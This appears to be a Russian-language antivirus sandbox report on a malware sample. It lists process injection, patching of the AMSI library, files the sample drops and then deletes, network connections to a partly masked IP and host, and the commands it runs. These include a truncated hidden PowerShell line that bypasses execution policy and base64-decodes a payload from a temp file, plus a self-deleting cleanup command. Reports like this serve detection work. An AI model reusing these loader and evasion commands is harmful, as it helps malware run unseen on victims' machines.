Техническая информация
Вредоносные функции
Внедряет код в
следующие пользовательские процессы:
- nkobwlmyfo.exe
- ypblgrg0uosl8ws.exe
Патчит код
в динамической библиотеке AMSI
- Процесс build0142348968.exe, модуль Amsi.dll
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\_t4928\r.bat
- %TEMP%\ksknxq.dat
- nul
- %TEMP%\nkobwlmyfo.exe
- %LOCALAPPDATA%\microsoft\clr_v4.0_32\usagelogs\nkobwlmyfo.exe.log
- %TEMP%\build0142348968.exe
- %TEMP%\ypblgrg0uosl8ws.exe
- %TEMP%\content\3396-1036-ypblgrg0uosl8ws.exe-19-14-53-803.dump
- %LOCALAPPDATA%\microsoft\clr_v4.0\usagelogs\build0142348968.exe.log
- %TEMP%\content\3396-1036-ypblgrg0uosl8ws.exe-19-15-13-240.dump
- %LOCALAPPDATA%\microsoft\clr_v4.0\usagelogs\ypblgrg0uosl8ws.exe.log
Удаляет файлы, которые сам же создал
- %TEMP%\ksknxq.dat
- %TEMP%\nkobwlmyfo.exe
- %TEMP%\_t4928\r.bat
Сетевая активность
Подключается к
- '19#.#7.99.156':34883
- 't.#e':443
TCP
Другие
- '19#.#7.99.156':34883
UDP
- DNS ASK t.#e
Другое
Создает и запускает на исполнение
- '%TEMP%\nkobwlmyfo.exe'
- '%TEMP%\build0142348968.exe'
- '%TEMP%\ypblgrg0uosl8ws.exe'
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\_t4928\r.bat" (со скрытым окном)
- '<SYSTEM32>\choice.exe' /t 1 /d y
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Executio Bypass -Wi Hi -Command "$coarz=-join([IO.File]::ReadAllLines($env:TEMP+'\ksknxq.dat'));Remove-Item($env:TEMP+'\ksknxq.dat') -Force -EA 0;$gu=[Convert]::FromBase64String($coarz);for($p...
- '<SYSTEM32>\cmd.exe' /C timeout /t 4 /nobreak >nul & Del "%TEMP%\Build0142348968.exe" (со скрытым окном)
- '<SYSTEM32>\timeout.exe' /t 4 /nobreak
- '%TEMP%\nkobwlmyfo.exe' (со скрытым окном)
